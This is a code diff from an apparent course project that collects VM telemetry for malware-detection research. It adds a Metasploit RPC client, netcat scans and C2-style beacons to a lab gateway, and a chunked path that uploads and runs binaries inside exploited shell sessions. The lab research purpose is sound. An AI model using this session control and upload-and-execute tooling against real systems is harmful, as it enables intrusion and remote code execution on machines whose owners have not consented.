+We talk msgpack over HTTPS to ``msfrpcd``. The full MSF RPC surface is
+huge; this client implements only the verbs we actually call:
+
+  auth.login                — get a token
+  auth.logout               — release the token
+  module.execute            — fire an exploit (or aux) module by name
+  job.list / job.stop       — manage the running module
+  session.list              — see opened sessions, find the one we just opened
+  session.shell_write/read  — run commands in a shell session
+  session.stop              — kill a session at episode end
+
+Why not pull in pymetasploit3? Two reasons:
+  - msfrpcd's protocol is small enough that owning it removes a third-party
+    dep (and a maintenance risk on a course project).
+  - the parts we need (session opening, shell commands, job lifecycle)
+    are simple, and we want full visibility into what's on the wire when
+    debugging an exploit fire.
+
+The client is intentionally synchronous; the Tier-3 driver runs in the
+orchestrator's main thread alongside the collector, and a session-open
+poll of a few hundred milliseconds is well within budget.
+"""
+
+from __future__ import annotations
+
+import http.client
+import logging
+import socket
+import ssl
+import time
+from dataclasses import dataclass
+from typing import Any
+
+try:
+    import msgpack  # type: ignore[import-untyped]
+except ImportError as e:  # pragma: no cover - import-time guard
+    raise ImportError(
+        "the msgpack package is required for the MSF RPC client. "
+        "install it with: pip install msgpack"
+    ) from e
+
+
+log = logging.getLogger("cis490.msfrpc")
+
+
+class MSFRpcError(RuntimeError):
+    """Raised when msfrpcd returns an error or a malformed response."""
+
+
+@dataclass
+class MSFRpcConfig:
+    host: str = "127.0.0.1"
+    port: int = 55553
+    user: str = "msf"
+    password: str = ""
+    ssl: bool = True
+    timeout_s: float = 30.0
+    # msfrpcd's default cert is self-signed — most callers will run
+    # against localhost where this is the right tradeoff. Override
+    # explicitly for any non-loopback host.
+    verify: bool = False
+
+
+class MSFRpcClient:
+    """Synchronous msfrpcd client. Token is acquired on ``login()`` and
+    re-used on every subsequent call. Not thread-safe; the driver owns
+    one client per episode."""
+
+    def __init__(self, cfg: MSFRpcConfig) -> None:
+        self.cfg = cfg
+        self._token: str | None = None
+
+    # ---- session management --------------------------------------------
+
+    def login(self) -> None:
+        resp = self._call_no_auth("auth.login", self.cfg.user, self.cfg.password)
+        if resp.get("result") != "success" or "token" not in resp:
+            raise MSFRpcError(f"auth.login failed: {resp!r}")
+        self._token = resp["token"]
+        log.info("msfrpc auth.login ok (token=%s...)", self._token[:8])
+
+    def logout(self) -> None:
+        if self._token is None:
+            return
+        try:
+            self._call("auth.logout", self._token)
+        except MSFRpcError as e:
+            log.warning("msfrpc auth.logout: %s", e)
+        finally:
+            self._token = None
+
+    # ---- modules --------------------------------------------------------
+
+    def module_execute(
+        self,
+        module_type: str,
+        module_name: str,
+        options: dict[str, Any],
+    ) -> dict[str, Any]:
+        """Fire a module. Returns ``{"job_id": int, "uuid": str}``."""
+        resp = self._call("module.execute", module_type, module_name, options)
+        if "job_id" not in resp:
+            raise MSFRpcError(f"module.execute returned no job_id: {resp!r}")
+        log.info(
+            "module.execute %s/%s -> job_id=%s uuid=%s",
+            module_type, module_name, resp["job_id"], resp.get("uuid"),
+        )
+        return resp
+
+    # ---- jobs -----------------------------------------------------------
+
+    def job_list(self) -> dict[str, str]:
+        return self._call("job.list")
+
+    def job_stop(self, job_id: int | str) -> dict[str, Any]:
+        # msfrpcd accepts the id as a string.
+        return self._call("job.stop", str(job_id))
+
+    # ---- sessions -------------------------------------------------------
+
+    def session_list(self) -> dict[int, dict[str, Any]]:
+        raw = self._call("session.list")
+        # msfrpcd keys session ids as ints in msgpack but some versions
+        # round-trip them as strings. Normalize.
+        out: dict[int, dict[str, Any]] = {}
+        for k, v in (raw or {}).items():
+            try:
+                out[int(k)] = v
+            except (TypeError, ValueError):
+                pass
+        return out
+
+    def session_shell_write(self, session_id: int, data: str) -> dict[str, Any]:
+        if not data.endswith("\n"):
+            data = data + "\n"
+        return self._call("session.shell_write", session_id, data)
+
+    def session_shell_read(self, session_id: int) -> str:
+        resp = self._call("session.shell_read", session_id)
+        return resp.get("data", "") if isinstance(resp, dict) else ""
+
+    def session_stop(self, session_id: int) -> dict[str, Any]:
+        return self._call("session.stop", session_id)
+
+    # ---- transport ------------------------------------------------------
+
+    def _call(self, method: str, *args: Any) -> dict[str, Any]:
+        if self._token is None:
+            raise MSFRpcError("not authenticated; call login() first")
+        return self._raw_call([method, self._token, *args])
+
+    def _call_no_auth(self, method: str, *args: Any) -> dict[str, Any]:
+        return self._raw_call([method, *args])
+
+    def _raw_call(self, payload: list[Any]) -> dict[str, Any]:
+        body = msgpack.packb(payload, use_bin_type=False)
+        conn = self._open_conn()
+        try:
+            conn.request(
+                "POST",
+                "/api/",
+                body=body,
+                headers={
+                    "Content-Type": "binary/message-pack",
+                    "Content-Length": str(len(body)),
+                    "Connection": "close",
+                },
+            )
+            r = conn.getresponse()
+            raw = r.read()
+            if r.status != 200:
+                raise MSFRpcError(
+                    f"msfrpcd HTTP {r.status} for {payload[0]!r}: {raw[:200]!r}"
+                )
+        except (socket.error, http.client.HTTPException) as e:
+            raise MSFRpcError(f"transport error calling {payload[0]!r}: {e}") from e
+        finally:
+            conn.close()
+
+        try:
+            decoded = msgpack.unpackb(raw, raw=False)
+        except Exception as e:
+            raise MSFRpcError(f"could not decode msfrpcd response: {e}") from e
+
+        if isinstance(decoded, dict) and decoded.get("error") is True:
+            raise MSFRpcError(
+                f"{payload[0]!r}: {decoded.get('error_class')} "
+                f"{decoded.get('error_message')}"
+            )
+        if not isinstance(decoded, dict):
+            # session.list and friends can legitimately return {} or a dict,
+            # but never a non-dict — anything else is a protocol violation.
+            raise MSFRpcError(
+                f"unexpected response type for {payload[0]!r}: {type(decoded).__name__}"
+            )
+        return decoded
+
+    def _open_conn(self) -> http.client.HTTPConnection:
+        if self.cfg.ssl:
+            ctx = ssl.create_default_context()
+            if not self.cfg.verify:
+                ctx.check_hostname = False
+                ctx.verify_mode = ssl.CERT_NONE
+            return http.client.HTTPSConnection(
+                self.cfg.host, self.cfg.port,
+                timeout=self.cfg.timeout_s, context=ctx,
+            )
+        return http.client.HTTPConnection(
+            self.cfg.host, self.cfg.port, timeout=self.cfg.timeout_s,
+        )
+
+
+def wait_for_new_session(
+    client: MSFRpcClient,
+    *,
+    seen: set[int],
+    timeout_s: float,
+    poll_s: float = 0.25,
+) -> tuple[int, dict[str, Any]] | None:
+    """Poll ``session.list`` until a session id we haven't seen before
+    appears, or until timeout. Returns ``(session_id, info)`` or None."""
+    deadline = time.monotonic() + timeout_s
+    while time.monotonic() < deadline:
+        sessions = client.session_list()
+        for sid, info in sessions.items():
+            if sid not in seen:
+                return sid, info
+        time.sleep(poll_s)
+    return None
--- a/exploits/workloads.py
+++ b/exploits/workloads.py
@ -0,0 +1,346 @@
+"""Per-sample-profile post-exploit workloads (driver v2).
+
+The Tier-3 driver lands a session and then needs to drive *something*
+in that session for the ``infected_running`` phase. Driver v1 ran
+``yes > /dev/null`` for every sample, which is fine for proving the
+pipe but is the wrong shape for ML — every Tier-3 episode produces
+the same envelope regardless of which malware family we said it was.
+
+Driver v2 maps ``sample.profile`` from the manifest to a distinct
+in-session workload so each profile's envelope is observably
+different on every collector:
+
+  cpu-saturate    → 1-vCPU saturation, very low IO/net (XMRig shape)
+  scan-and-dial   → SYN scans across the bridge IP space + periodic
+                    dial-home (Mirai shape)
+  io-walk         → fs traversal + random write spikes (ransomware shape)
+  bursty-c2       → long idle, periodic short TCP egress bursts (Dridex)
+  low-and-slow    → minimal CPU, periodic memory churn (Kovter)
+  shell-resident  → one long-lived TCP socket pinned to a bridge IP,
+                    occasional small command bursts (RAT)
+
+Each profile returns a small shell command that backgrounds a loop
+inside the session. The driver can stop them by killing the loop's
+PID file or via a profile-specific kill command.
+
+This module is intentionally *behaviorally diverse but harmless* —
+it does NOT execute real malware. Real binaries land via the Tier-4
+fetch+run path (separate work). What this gives us today is six
+distinguishable in-guest envelopes the ML model can learn to
+discriminate between *and* fall back to when a real sample isn't yet
+staged.
+"""
+
+from __future__ import annotations
+
+import logging
+from dataclasses import dataclass
+
+from samples.manifest import Sample
+
+
+log = logging.getLogger("cis490.exploits.workloads")
+
+
+@dataclass(frozen=True)
+class Workload:
+    """A pair of shell commands executable in a Metasploit shell session.
+
+    ``start_cmd`` backgrounds a loop and writes its PID to ``pid_path``.
+    ``stop_cmd`` kills the loop using that PID file. Both commands are
+    expected to be POSIX-shell compatible and to leave the session in
+    a usable state on completion (return code 0 on the prompt)."""
+    profile: str
+    start_cmd: str
+    stop_cmd: str
+    description: str
+
+    @property
+    def pid_path(self) -> str:
+        return f"/tmp/.cis490-workload-{self.profile}.pid"
+
+
+def _wrap_loop(name: str, body: str) -> Workload:
+    """Common pattern: write a small wrapper script that loops ``body``,
+    background it, and stash the wrapper's PID. Stop kills that PID +
+    its child group."""
+    pid_path = f"/tmp/.cis490-workload-{name}.pid"
+    script_path = f"/tmp/.cis490-workload-{name}.sh"
+    # Triple-quote the body into a heredoc so single-quotes inside the
+    # body don't conflict with our outer single-quoting.
+    start = (
+        f"cat > {script_path} <<'CIS490_EOF'\n"
+        f"#!/bin/sh\n"
+        f"trap 'exit 0' TERM INT\n"
+        f"while :; do\n"
+        f"{body}\n"
+        f"done\n"
+        f"CIS490_EOF\n"
+        f"chmod +x {script_path}; "
+        f"nohup sh {script_path} </dev/null >/dev/null 2>&1 &\n"
+        f"echo $! > {pid_path}\n"
+        f"disown\n"
+    )
+    stop = (
+        f"if [ -f {pid_path} ]; then "
+        f"  kill -- -$(cat {pid_path}) 2>/dev/null; "
+        f"  kill $(cat {pid_path}) 2>/dev/null; "
+        f"  rm -f {pid_path} {script_path}; "
+        f"fi; true\n"
+    )
+    return Workload(profile=name, start_cmd=start, stop_cmd=stop,
+                    description="(generated)")
+
+
+# ---------------------------------------------------------------------------
+# Profile factories — each returns a Workload tuned to that family
+# ---------------------------------------------------------------------------
+
+
+def _cpu_saturate() -> Workload:
+    """XMRig-class — sustained single-vCPU saturation, no IO, no net."""
+    body = "  yes > /dev/null 2>&1 &\n  wait $!\n"
+    w = _wrap_loop("cpu-saturate", body)
+    return Workload(
+        profile="cpu-saturate",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="100% CPU on 1 vCPU; no IO, no net",
+    )
+
+
+def _scan_and_dial() -> Workload:
+    """Mirai-class — TCP SYN-style probe of bridge subnet + occasional
+    "dial home" to the gateway. Heavy net, moderate CPU.
+
+    Uses ``nc`` (netcat) instead of bash's /dev/tcp redirects — the
+    latter is bash-only and silently no-ops on busybox / dash, which
+    is what Metasploitable2 and Alpine guest sessions actually run.
+    Falls back to a TCP-via-python one-liner if nc isn't available."""
+    body = (
+        "  for i in 1 2 3 4 5 6 7 8 9 10; do\n"
+        "    nc -z -w 1 10.200.0.$((i+1)) 23 >/dev/null 2>&1 &\n"
+        "    nc -z -w 1 10.200.0.$((i+1)) 2323 >/dev/null 2>&1 &\n"
+        "  done\n"
+        "  wait\n"
+        "  echo dial-home | nc -w 1 10.200.0.1 4444 >/dev/null 2>&1\n"
+        "  sleep 2\n"
+    )
+    w = _wrap_loop("scan-and-dial", body)
+    return Workload(
+        profile="scan-and-dial",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="Periodic SYN-style scan across bridge IPs + dial-home",
+    )
+
+
+def _io_walk() -> Workload:
+    """Cryptolocker-class — fs traversal + write spikes. Heavy disk."""
+    body = (
+        "  mkdir -p /tmp/.cis490-victim\n"
+        "  for n in 1 2 3 4 5 6 7 8; do\n"
+        "    dd if=/dev/urandom of=/tmp/.cis490-victim/f$n bs=4k count=64 2>/dev/null\n"
+        "  done\n"
+        "  for f in /tmp/.cis490-victim/*; do cat $f > /dev/null; done\n"
+        "  sleep 1\n"
+    )
+    w = _wrap_loop("io-walk", body)
+    return Workload(
+        profile="io-walk",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="FS traversal + random-data writes, periodic re-read",
+    )
+
+
+def _bursty_c2() -> Workload:
+    """Dridex-class — long idle, periodic small TCP burst to a fixed
+    peer (the bridge gateway). nc-based for busybox compatibility."""
+    body = (
+        "  sleep 25\n"
+        "  for i in 1 2 3; do\n"
+        "    echo c2-beacon-$$-$i | nc -w 1 10.200.0.1 4445 >/dev/null 2>&1\n"
+        "    sleep 1\n"
+        "  done\n"
+    )
+    w = _wrap_loop("bursty-c2", body)
+    return Workload(
+        profile="bursty-c2",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="Long idle + periodic 3-packet egress burst to gateway",
+    )
+
+
+def _low_and_slow() -> Workload:
+    """Kovter-class — low CPU, periodic memory churn, no on-disk
+    artifact. The hardest envelope to label from /proc alone."""
+    body = (
+        "  sleep 8\n"
+        "  awk 'BEGIN { for(i=0;i<200000;i++) a[i]=i*i; }' >/dev/null 2>&1\n"
+        "  sleep 4\n"
+    )
+    w = _wrap_loop("low-and-slow", body)
+    return Workload(
+        profile="low-and-slow",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="Periodic memory churn (~200k array allocs) on a slow cycle",
+    )
+
+
+def _shell_resident() -> Workload:
+    """RAT-style — keep a single TCP connection open to the gateway
+    with occasional command bursts. Long-lived flow, small bytes.
+
+    Uses ``nc -w`` on the busybox-compatible path. We pipe a slow
+    feed into nc so the connection stays open for ~30 s before the
+    -w idle timeout closes it, matching the long-lived-flow shape.
+    Then we sleep + reconnect, producing the periodic-tick pattern."""
+    body = (
+        "  ( for i in 1 2 3 4 5 6; do\n"
+        "      echo cmd-tick-$i\n"
+        "      sleep 5\n"
+        "    done ) | nc -w 30 10.200.0.1 4446 >/dev/null 2>&1\n"
+        "  sleep 5\n"
+    )
+    w = _wrap_loop("shell-resident", body)
+    return Workload(
+        profile="shell-resident",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="Resident TCP connection to gateway with periodic ticks",
+    )
+
+
+_FACTORIES = {
+    "cpu-saturate":   _cpu_saturate,
+    "scan-and-dial":  _scan_and_dial,
+    "io-walk":        _io_walk,
+    "bursty-c2":      _bursty_c2,
+    "low-and-slow":   _low_and_slow,
+    "shell-resident": _shell_resident,
+}
+
+
+def workload_for(sample: Sample | None) -> Workload | None:
+    """Return the Workload matching ``sample.profile``, or None when
+    no sample is supplied (driver v1 fallback path)."""
+    if sample is None:
+        return None
+    factory = _FACTORIES.get(sample.profile)
+    if factory is None:
+        log.warning("no workload profile for %r; falling back to cpu-saturate", sample.profile)
+        return _cpu_saturate()
+    return factory()
+
+
+def all_profiles() -> list[str]:
+    return sorted(_FACTORIES.keys())
+
+
+# ---------------------------------------------------------------------------
+# Tier-4 path: real-binary upload + execute inside the shell session
+# ---------------------------------------------------------------------------
+
+
+@dataclass(frozen=True)
+class ChunkedUpload:
+    """Multi-step upload plan. Each chunk is one ``shell_write`` call;
+    the driver issues them in order, then a final integrity check, then
+    the exec command. The last command runs the binary and writes its
+    PID to ``pid_path``."""
+    profile: str
+    chunks: tuple[str, ...]      # each is a complete shell command
+    finalize_cmd: str            # decode + verify sha256 + chmod
+    exec_cmd: str                # actually launch the binary
+    stop_cmd: str
+    bin_path: str
+    pid_path: str
+    expected_sha256: str
+    n_chunks: int
+
+
+# Conservative chunk size: msfrpc shell_write payloads are reliable
+# under ~16 KiB (single TCP write inside the framework). Use 8 KiB of
+# *base64* (which is 6 KiB of binary) per chunk so we leave room for
+# the wrapper and stay well under the limit.
+_CHUNK_B64_BYTES = 8 * 1024
+
+
+def chunked_real_binary_upload(
+    binary_bytes: bytes,
+    sample: Sample | None = None,
+) -> ChunkedUpload:
+    """Plan a chunked upload of ``binary_bytes`` into a shell session.
+
+    First chunk creates an empty file; subsequent chunks append a
+    base64 segment. ``finalize_cmd`` decodes + sha256-verifies the
+    result; ``exec_cmd`` launches the binary and stashes its PID.
+    The driver issues these as separate shell_writes so we never
+    push more than ~10 KiB through msfrpc in a single call."""
+    import base64 as _b64
+    import hashlib as _hashlib
+
+    profile = (sample.profile if sample else "real-binary")
+    pid_path = f"/tmp/.cis490-real-{profile}.pid"
+    bin_path = f"/tmp/.cis490-real-{profile}.bin"
+    b64_path = f"/tmp/.cis490-real-{profile}.b64"
+    sha = _hashlib.sha256(binary_bytes).hexdigest()
+    encoded = _b64.b64encode(binary_bytes).decode("ascii")
+
+    chunks: list[str] = []
+    chunks.append(f"mkdir -p /tmp; : > {b64_path}; echo upload-begin")
+    for i in range(0, len(encoded), _CHUNK_B64_BYTES):
+        seg = encoded[i:i + _CHUNK_B64_BYTES]
+        # printf '%s' avoids interpreting '%' / '\\' inside the b64 chars.
+        chunks.append(f"printf '%s' '{seg}' >> {b64_path}")
+
+    finalize = (
+        f"base64 -d {b64_path} > {bin_path} && rm -f {b64_path} && "
+        f"chmod +x {bin_path} && "
+        f"GOT=$(sha256sum {bin_path} | awk '{{print $1}}') && "
+        f"if [ \"$GOT\" = \"{sha}\" ]; then echo sha-ok; "
+        f"else echo sha-mismatch:$GOT; rm -f {bin_path}; false; fi"
+    )
+    exec_cmd = (
+        f"nohup {bin_path} </dev/null >/dev/null 2>&1 & "
+        f"echo $! > {pid_path}; disown; echo exec-ok"
+    )
+    stop = (
+        f"if [ -f {pid_path} ]; then "
+        f"  kill -- -$(cat {pid_path}) 2>/dev/null; "
+        f"  kill $(cat {pid_path}) 2>/dev/null; "
+        f"  rm -f {pid_path} {bin_path}; "
+        f"fi; true"
+    )
+    return ChunkedUpload(
+        profile=f"real:{profile}",
+        chunks=tuple(chunks),
+        finalize_cmd=finalize,
+        exec_cmd=exec_cmd,
+        stop_cmd=stop,
+        bin_path=bin_path,
+        pid_path=pid_path,
+        expected_sha256=sha,
+        n_chunks=len(chunks),
+    )
+
+
+def real_binary_workload(binary_bytes: bytes, sample: Sample | None = None) -> Workload:
+    """Backwards-compat wrapper that produces a single-shot Workload
+    by concatenating a chunked plan into one start_cmd. Kept for
+    callers that drive the v1 single-shell-write flow (e.g. tests).
+
+    Production path: the driver should call ``chunked_real_binary_upload``
+    and walk the chunks itself so msfrpc never sees a buffer-busting
+    payload."""
+    plan = chunked_real_binary_upload(binary_bytes, sample=sample)
+    start = "\n".join(list(plan.chunks) + [plan.finalize_cmd, plan.exec_cmd]) + "\n"
+    return Workload(
+        profile=plan.profile,
+        start_cmd=start,
+        stop_cmd=plan.stop_cmd,
+        description=f"Real binary upload+execute ({len(binary_bytes)} bytes, {plan.n_chunks} chunks)",
+    )
--- a/orchestrator/episode.py
+++ b/orchestrator/episode.py
@ -36,7 +36,8 @@ from datetime import datetime, timezone
 from pathlib import Path
 from typing import Callable

-from collectors import proc_qemu
+from collectors import guest_agent, pcap, perf_qemu, proc_qemu, qmp
+from samples.manifest import Sample

 from .ulid import new_ulid

@ -61,6 +62,38 @@ class EpisodeConfig:
    # When set, walk this schedule and ignore duration_s for sleep timing.
    # ``duration_s`` still goes in meta.schedule for record-keeping.
    phase_schedule: PhaseSchedule | None = None
+    # Optional: paths to QEMU sockets exposed by the launcher. When
+    # set, EpisodeRunner spins up additional collector threads.
+    qmp_socket: Path | None = None
+    qmp_interval_ms: int = 1000  # QMP queries are heavier than /proc reads
+    guest_agent_socket: Path | None = None
+    # Optional: bridge interface to capture per-episode pcap on. When
+    # set, EpisodeRunner spawns tcpdump for the duration of the
+    # schedule and bucketizes the result into netflow.jsonl on stop.
+    bridge_iface: str | None = None
+    bridge_ip: str = "10.200.0.1"
+    pcap_snaplen: int = 256
+    # Source 3: perf stat sampling. Disabled by default because perf
+    # needs CAP_SYS_ADMIN or perf_event_paranoid <= 1; enable
+    # explicitly per-episode when the host supports it.
+    enable_perf: bool = False
+    perf_interval_ms: int = 100
+    # The Sample that drove this episode's workload selection. Stamped
+    # into meta.json so trainers can join episodes by family / kind
+    # without re-deriving from events. None = v1 yes-loop fallback.
+    sample: Sample | None = None
+    # The exploit module that fired (Tier 3+). Plain dict so the runner
+    # doesn't need to import exploits.modules; populated by callers
+    # that have a ModuleConfig in hand.
+    exploit_meta: dict | None = None
+    # Snapshot/revert (Tier 0+):
+    #   revert_at_start — before any phase walks, loadvm <snapshot_name>.
+    #     Use this to drop the guest back to a known-good baseline at
+    #     the start of every episode in a long-lived-VM fleet loop.
+    #   revert_at_end — after the schedule walks, loadvm <snapshot_name>
+    #     so the next consumer of this VM starts clean too.
+    revert_at_start: bool = False
+    revert_at_end: bool = False


@dataclass
@ -68,8 +101,13 @@ class EpisodeResult:
    episode_id: str
    episode_dir: Path
    rows_proc: int
-    pid_disappeared: bool
-    duration_observed_s: float
+    rows_qmp: int = 0
+    rows_guest: int = 0
+    rows_netflow: int = 0
+    rows_perf: int = 0
+    pcap_bytes: int = 0
+    pid_disappeared: bool = False
+    duration_observed_s: float = 0.0
    phases_observed: list[str] = field(default_factory=list)


@ -83,25 +121,73 @@ class EpisodeRunner:
        self.on_phase = on_phase
        self.episode_id = cfg.episode_id or new_ulid()
        self.episode_dir: Path = cfg.data_root / "episodes" / self.episode_id
+        # Create the dir up front so external drivers can call
+        # emit_event() between construction and run() — e.g. an exploit
+        # driver that writes a driver_setup event before the schedule
+        # walks. The dir is otherwise empty until run() opens files.
+        self.episode_dir.mkdir(parents=True, exist_ok=True)
        self._t_mono_origin_ns: int = 0
        self._stop = threading.Event()

    # ---- public ---------------------------------------------------------

    def run(self) -> EpisodeResult:
-        self.episode_dir.mkdir(parents=True, exist_ok=True)
        self._t_mono_origin_ns = time.monotonic_ns()
-        started_at_wall = datetime.now(timezone.utc).isoformat()
+        # snapshot_load is the marker for "episode clock = 0". Emit
+        # BEFORE any file I/O — _write_meta() takes >1 ms on slow disks
+        # (Refs spectral/CIS490#7).
+        self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name)

+        started_at_wall = datetime.now(timezone.utc).isoformat()
        meta = self._initial_meta(started_at_wall)
        self._write_meta(meta)

-        self._emit_event(0, "snapshot_load", snapshot=self.cfg.snapshot_name)
+        # Snapshot revert at start: pause+restore the guest to a known
+        # baseline before phase 0. Requires QMP and a savevm having
+        # already taken place (the launcher is responsible for that).
+        if self.cfg.revert_at_start and self.cfg.qmp_socket is not None:
+            try:
+                client = qmp.QMPClient(self.cfg.qmp_socket)
+                client.connect()
+                try:
+                    out = client.loadvm(self.cfg.snapshot_name)
+                    self.emit_event(
+                        "snapshot_revert",
+                        when="start",
+                        snapshot=self.cfg.snapshot_name,
+                        output=(out or "").strip()[:256],
+                    )
+                finally:
+                    client.close()
+            except Exception as e:
+                log.warning("loadvm at start failed: %s", e)
+                self.emit_event(
+                    "snapshot_revert_failed",
+                    when="start",
+                    snapshot=self.cfg.snapshot_name,
+                    error=str(e),
+                )

-        rows_holder: dict[str, int] = {"rows": 0}
+        rows_holder: dict[str, int] = {"proc": 0, "qmp": 0, "guest": 0, "netflow": 0, "perf": 0}
+        pcap_handle: pcap.CaptureHandle | None = None
+        pcap_path = self.episode_dir / "network.pcap"
+        netflow_path = self.episode_dir / "netflow.jsonl"
+        if self.cfg.bridge_iface:
+            try:
+                pcap_handle = pcap.run_capture(
+                    bridge=self.cfg.bridge_iface,
+                    pcap_path=pcap_path,
+                    snaplen=self.cfg.pcap_snaplen,
+                )
+                self.emit_event("pcap_started", iface=self.cfg.bridge_iface)
+            except (OSError, FileNotFoundError) as e:
+                log.warning("pcap capture not available on %s: %s",
+                            self.cfg.bridge_iface, e)
+                self.emit_event("pcap_unavailable",
+                                iface=self.cfg.bridge_iface, error=str(e))

-        def _collector() -> None:
-            rows_holder["rows"] = proc_qemu.run_loop(
+        def _proc_collector() -> None:
+            rows_holder["proc"] = proc_qemu.run_loop(
                pid=self.cfg.target_pid,
                output_path=self.episode_dir / "telemetry-proc.jsonl",
                t_mono_origin_ns=self._t_mono_origin_ns,
@ -109,8 +195,44 @@ class EpisodeRunner:
                stop_event=self._stop,
            )

-        t = threading.Thread(target=_collector, daemon=True, name="proc_qemu")
-        t.start()
+        def _qmp_collector() -> None:
+            assert self.cfg.qmp_socket is not None
+            rows_holder["qmp"] = qmp.run_loop(
+                socket_path=self.cfg.qmp_socket,
+                output_path=self.episode_dir / "telemetry-qmp.jsonl",
+                t_mono_origin_ns=self._t_mono_origin_ns,
+                interval_ms=self.cfg.qmp_interval_ms,
+                stop_event=self._stop,
+            )
+
+        def _guest_collector() -> None:
+            assert self.cfg.guest_agent_socket is not None
+            rows_holder["guest"] = guest_agent.run_loop(
+                socket_path=self.cfg.guest_agent_socket,
+                output_path=self.episode_dir / "telemetry-guest.jsonl",
+                t_mono_origin_ns=self._t_mono_origin_ns,
+                stop_event=self._stop,
+            )
+
+        def _perf_collector() -> None:
+            rows_holder["perf"] = perf_qemu.run_loop(
+                pid=self.cfg.target_pid,
+                output_path=self.episode_dir / "telemetry-perf.jsonl",
+                t_mono_origin_ns=self._t_mono_origin_ns,
+                interval_ms=self.cfg.perf_interval_ms,
+                stop_event=self._stop,
+            )
+
+        threads: list[threading.Thread] = []
+        threads.append(threading.Thread(target=_proc_collector, daemon=True, name="proc_qemu"))
+        if self.cfg.qmp_socket is not None:
+            threads.append(threading.Thread(target=_qmp_collector, daemon=True, name="qmp"))
+        if self.cfg.guest_agent_socket is not None:
+            threads.append(threading.Thread(target=_guest_collector, daemon=True, name="guest_agent"))
+        if self.cfg.enable_perf:
+            threads.append(threading.Thread(target=_perf_collector, daemon=True, name="perf"))
+        for t in threads:
+            t.start()

        phases_observed: list[str] = []
        try:
@ -121,21 +243,60 @@ class EpisodeRunner:
                phases_observed = ["clean"]
                self._stop.wait(timeout=self.cfg.duration_s)
        finally:
-            self._stop.set()
-            t.join(timeout=2.0)
+            # Optional revert before stopping collectors so the
+            # transition shows up in their telemetry too — useful for
+            # building "snapshot revert" as a labeled phase later.
+            if self.cfg.revert_at_end and self.cfg.qmp_socket is not None:
+                try:
+                    client = qmp.QMPClient(self.cfg.qmp_socket)
+                    client.connect()
+                    try:
+                        out = client.loadvm(self.cfg.snapshot_name)
+                        self.emit_event(
+                            "snapshot_revert",
+                            when="end",
+                            snapshot=self.cfg.snapshot_name,
+                            output=(out or "").strip()[:256],
+                        )
+                    finally:
+                        client.close()
+                except Exception as e:
+                    log.warning("loadvm at end failed: %s", e)
+                    self.emit_event(
+                        "snapshot_revert_failed",
+                        when="end",
+                        snapshot=self.cfg.snapshot_name,
+                        error=str(e),
+                    )
+
+            self._stop.set()
+            for t in threads:
+                t.join(timeout=3.0)
+            if pcap_handle is not None:
+                rc = pcap.stop_capture(pcap_handle)
+                self.emit_event("pcap_stopped", rc=rc,
+                                pcap_bytes=pcap_path.stat().st_size if pcap_path.exists() else 0)
+                rows_holder["netflow"] = pcap.bucketize(
+                    pcap_path, netflow_path,
+                    bucket_ms=100,
+                    t_mono_origin_ns=self._t_mono_origin_ns,
+                    bridge_ip=self.cfg.bridge_ip,
+                )

-        end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
        pid_alive = _pid_alive(self.cfg.target_pid)
-        self._emit_event(
-            end_mono_ns,
-            "episode_end",
-            target_pid_alive=pid_alive,
-        )
+        self.emit_event("episode_end", target_pid_alive=pid_alive)
+        end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns

        meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat()
+        pcap_size = pcap_path.stat().st_size if pcap_path.exists() else 0
        meta["result"] = {
            "phases_observed": phases_observed,
-            "rows_proc": rows_holder["rows"],
+            "rows_proc": rows_holder["proc"],
+            "rows_qmp": rows_holder["qmp"],
+            "rows_guest": rows_holder["guest"],
+            "rows_perf": rows_holder["perf"],
+            "rows_netflow": rows_holder["netflow"],
+            "pcap_bytes": pcap_size,
            "pid_alive_at_end": pid_alive,
            "duration_observed_s": end_mono_ns / 1_000_000_000,
        }
@ -143,16 +304,22 @@ class EpisodeRunner:
        (self.episode_dir / "done.marker").touch()

        log.info(
-            "episode %s complete: rows=%d duration=%.2fs phases=%s",
+            "episode %s complete: proc=%d qmp=%d guest=%d perf=%d netflow=%d pcap=%dB duration=%.2fs phases=%s",
            self.episode_id,
-            rows_holder["rows"],
+            rows_holder["proc"], rows_holder["qmp"], rows_holder["guest"],
+            rows_holder["perf"], rows_holder["netflow"], pcap_size,
            end_mono_ns / 1e9,
            phases_observed,
        )
        return EpisodeResult(
            episode_id=self.episode_id,
            episode_dir=self.episode_dir,
-            rows_proc=rows_holder["rows"],
+            rows_proc=rows_holder["proc"],
+            rows_qmp=rows_holder["qmp"],
+            rows_guest=rows_holder["guest"],
+            rows_netflow=rows_holder["netflow"],
+            rows_perf=rows_holder["perf"],
+            pcap_bytes=pcap_size,
            pid_disappeared=not pid_alive,
            duration_observed_s=end_mono_ns / 1_000_000_000,
            phases_observed=phases_observed,
@ -171,9 +338,7 @@ class EpisodeRunner:
                break
            t_mono = time.monotonic_ns() - self._t_mono_origin_ns
            self._emit_label(t_mono, phase, prev=prev, reason="scheduled")
-            self._emit_event(
-                t_mono, "phase_transition", to=phase, prev=prev
-            )
+            self.emit_event("phase_transition", to=phase, prev=prev)
            if self.on_phase is not None:
                try:
                    self.on_phase(phase)
@ -185,6 +350,17 @@ class EpisodeRunner:
        return observed

    def _initial_meta(self, started_at_wall: str) -> dict:
+        sample_meta: dict | None = None
+        if self.cfg.sample is not None:
+            s = self.cfg.sample
+            sample_meta = {
+                "name": s.name,
+                "family": s.family,
+                "category": s.category,
+                "profile": s.profile,
+                "kind": s.kind,
+                "sha256": s.sha256,
+            }
        return {
            "episode_id": self.episode_id,
            "schema_version": SCHEMA_VERSION,
@ -202,8 +378,8 @@ class EpisodeRunner:
                "ram_mib": None,
                "target_pid": self.cfg.target_pid,
            },
-            "exploit": None,
-            "sample": None,
+            "exploit": self.cfg.exploit_meta,
+            "sample": sample_meta,
            "schedule": {
                "baseline_seconds": self.cfg.duration_s,
                "interval_ms": self.cfg.interval_ms,
@ -220,7 +396,15 @@ class EpisodeRunner:
